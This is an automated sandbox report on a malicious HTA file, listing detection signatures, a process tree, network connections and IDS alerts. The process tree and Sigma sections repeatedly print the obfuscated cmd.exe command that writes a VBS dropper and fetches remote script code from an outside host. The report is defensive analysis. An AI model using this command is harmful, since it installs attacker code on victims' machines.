Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Archivo-PxFkiLTWYG-23122024095010.hta

Overview

General Information

Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
Analysis ID:1579831
MD5:74903ec7a266a9d8d2c5d96d8b9b4965
SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Command shell drops VBS files
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • mshta.exe (PID: 6236 cmdline: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7636 cmdline: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 4448 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 596 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6928 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 6464 cmdline: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • wscript.exe (PID: 5388 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 5388, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49760
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6464, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 5388, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6236, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ProcessId: 7636, ProcessName: cmd.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6464, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 5388, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 596, TargetFilename: C:\Users\Public\cNOV.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 5388, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49760
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6464, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" , ProcessId: 5388, ProcessName: wscript.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T10:48:57.194882+010020244491Attempted User Privilege Gain192.168.11.204975852.95.165.10443TCP

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 142.250.189.226:443 -> 192.168.11.20:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.5.232.230:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.95.165.10:443 -> 192.168.11.20:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.11.20:49760 version: TLS 1.2

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.11.20:49758 -> 52.95.165.10:443
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: securepubads.g.doubleclick.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: logs-referer.s3-sa-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: mshta.exe, 00000000.00000003.25432134093.0000000009C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanascom57a9fbc745a0accf31ede641-f6bf9b6e2d4f655df5fbe38708bea6b19d4c-4b39a2d52fdb655df5fbe38708bea6b19d4c-6dad57059553 equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4.4-5.3-5.8-8.9-1.1-2.7-2.3-6.8-2.7-14.4-.3-8.2-.4-10.6-.4-31.3 0-20.7.1-23.1.4-31.3.4-7.6 1.6-11.7
Source: mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 6.33-.198.726-.066 1.078.264.682.99 1.012 1.21 1.1l.044.022c.308.132.638.22 1.386.22.374 0 .836-.022 1.408-.088-.11.242-.242.55-.352.726l-.088.154c-.198.396-.968 1.474-2.31 3.212a6.348 6.348 0 00-1.782.066S6.4 17.246 5.85 15.75m1.012 2.772c-.044.11-.176.154-.264.11-.022-.022-.77-.308-1.298-1.034s-.616-1.144-.638-1.188a.203.203 0 11.396-.088s.044.22.286.616l.88 1.012c.286.198.506.308.506.308.132.044.176.154.132.264m-1.078.55c-.044.11-.176.132-.286.088-.022-.022-.726-.396-1.188-1.166-.462-.77-.506-1.188-.506-1.232-.022-.11.066-.22.198-.22.11-.022.22.066.22.198 0 0 .022.22.22.638l.77 1.078c.264.22.484.352.484.352.088.022.132.154.088.264" fill="#FFF"></path></svg><span class="social__AccessbilityText-sc-22330g-2 hDBSXO">tradutor para Libras</span></button><a class="social__KnowMoreLink-sc-22330g-3 iZTAMQ" aria-current="page" href="https://www.americanas.com.br/hotsite/acessibilidade">acessibilidade digital <br/> na Americanas</a><ul class="social-links__Container-sc-1a99ou5-0 kCohPr"><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.youtube.com/CanalAmericanas"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 355 255.1" aria-labelledby="youtubeIcon youtubeDesc" fill="#999" width="25px" height="25px"><path d="M340.5 48.6c-3.9-14.6-15.4-26-29.9-29.9-26.4-7.1-132.3-7.1-132.3-7.1S72.4 11.6 46 18.7C31.5 22.5 20 34 16.1 48.6 9 75 9 130.1 9 130.1s0 55.1 7.1 81.5c3.9 14.6 15.4 26 29.9 29.9 26.4 7.1 132.3 7.1 132.3 7.1s105.9 0 132.3-7.1c14.6-3.9 26-15.4 29.9-29.9 7.1-26.4 7.1-81.5 7.1-81.5s0-55.1-7.1-81.5zm-196 132.3V79.3l88 50.8-88 50.8z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.facebook.com/americanas"><svg viewBox="0 0 77 145" aria-labelledby="facebookIcon facebookDesc" fill="#999" width="20px" height="20px"><path d="M71.3 78.2l3.6-25.4H49.6V36.5c-.8-3.6.3-7.2 2.9-9.7 2.6-2.6 6.3-3.6 9.8-2.8h13.5V1C69.1.3 62.4 0 55.7 0c-9-.4-17.8 3.1-24 9.6-6.3 6.5-9.4 15.3-8.7 24.3v18.9H.9v25.4H23V144h26.6V78.2h21.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.instagram.com/americanas"><svg viewBox="0 0 156 156" aria-labelledby="instagramIcon instagramDesc" fill="#999" width="20px" height="20px"><path d="M77.5 14c20.7 0 23.1.1 31.3.4 7.6.4 11.7 1.6 14.4 2.7 3.6 1.4 6.2 3.1 8.9 5.8 2.7 2.7 4.4 5.3 5.8 8.9 1.1 2.7 2.3 6.8 2.7 14.4.3 8.2.4 10.6.4 31.3 0 20.7-.1 23.1-.4 31.3-.4 7.6-1.6 11.7-2.7 14.4-1.4 3.6-3.1 6.2-5.8 8.9-2.7 2.7-5.3 4.4-8.9 5.8-2.7 1.1-6.8 2.3-14.4 2.7-8.2.3-10.6.4-31.3.4-20.7 0-23.1-.1-31.3-.4-7.6-.4-11.7-1.6-14.4-2.7-3.6-1.4-6.2-3.1-8.9-5.8-2.7-2.7-4.4-5.3-5.8-8.9-1.1-2.7-2.3-6.8-2.7-14.4-.3-8.2-.4-10.6-.4-31.3 0-20.7.1-23.1.4-31.3.4-7.6 1.6-11.7
Source: mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 3.6-18.8.4-8.2.5-10.9.5-31.9s-.1-23.7-.5-31.9c-.4-8.3-1.7-13.9-3.6-18.8-2-5.1-4.6-9.5-8.9-13.8-4.3-4.3-8.7-6.9-13.8-8.9-4.9-1.9-10.5-3.2-18.8-3.6C101.2.1 98.5 0 77.5 0m0 37.7c-22 0-39.8 17.8-39.8 39.8 0 22 17.8 39.8 39.8 39.8 22 0 39.8-17.8 39.8-39.8 0-22-17.8-39.8-39.8-39.8zm0 65.6c-14.3 0-25.8-11.5-25.8-25.8s11.5-25.8 25.8-25.8 25.8 11.5 25.8 25.8-11.5 25.8-25.8 25.8zm50.7-67.2c0 5.2-4.2 9.3-9.3 9.3-5.2 0-9.3-4.1-9.3-9.3 0-5.1 4.1-9.3 9.3-9.3 5.1 0 9.3 4.2 9.3 9.3"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://twitter.com/americanas"><svg viewBox="0 0 191 156" aria-labelledby="twitterIcon twitterDesc" fill="#999" width="20px" height="20px"><path d="M190.7 18.5c-7.1 3.1-14.7 5.2-22.5 6.2 8.2-4.9 14.3-12.7 17.2-21.8-7.7 4.6-16.1 7.8-24.8 9.5-12.2-13-31.5-16.1-47.1-7.8C97.9 13 89.9 30.8 94 48.1 62.5 46.5 33.2 31.7 13.3 7.2 2.9 25.1 8.2 48 25.4 59.5c-6.2-.2-12.3-1.9-17.7-4.9-.2 18.8 12.9 35.2 31.4 38.9-3.3.9-6.8 1.3-10.3 1.3-2.5 0-4.9-.2-7.4-.7 5.1 15.9 19.8 26.8 36.5 27.1C44.1 132.1 27 138 9.4 138c-3.2.2-6.3.2-9.4 0 17.9 11.5 38.8 17.6 60.1 17.6 29.5.2 58-11.5 78.9-32.4 20.9-20.9 32.6-49.4 32.4-78.9v-5.1c7.6-5.7 14.2-12.7 19.3-20.7z"></path></svg></a></li><li class="social-links__SocialIcon-sc-1a99ou5-2 cJOhqW"><a class="social-links__SocialLink-sc-1a99ou5-1 lctwuy" target="_blank" aria-current="page" href="https://www.tiktok.com/@americanas"><svg xmlns="http://www.w3.org/2000/svg" width="20px" height="20px" viewBox="0 0 17.376 20" fill="#999"><path d="M9.127.017C10.218 0 11.302.01 12.386 0a5.191 5.191 0 001.458 3.477 5.885 5.885 0 003.533 1.491v3.356a8.853 8.853 0 01-3.5-.807 10.128 10.128 0 01-1.351-.775c-.006 2.435.01 4.867-.016 7.292a6.344 6.344 0 01-1.127 3.285 6.2 6.2 0 01-4.925 2.673 6.064 6.064 0 01-3.4-.856 6.28 6.28 0 01-3.04-4.76 13.89 13.89 0 01-.01-1.24 6.28 6.28 0 017.277-5.571c.017 1.234-.033 2.468-.033 3.7a2.867 2.867 0 00-3.657 1.77 3.313 3.313 0 00-.113 1.341 2.845 2.845 0 005.225 1.052 1.965 1.965 0 00.342-.886c.082-1.491.049-2.975.059-4.466.007-3.36-.01-6.71.016-10.059z" fill="#999"></path></svg></a></li></ul></div></div><div class="src__AddressWrapper-sc-hq16uc-2 cBxbIj"><address class="address__Container-sc-ntruru-0 flQmRN">americanas s.a. / CNPJ: 00.776.574/0006-60 / Inscri equals www.twitter.com (Twitter)
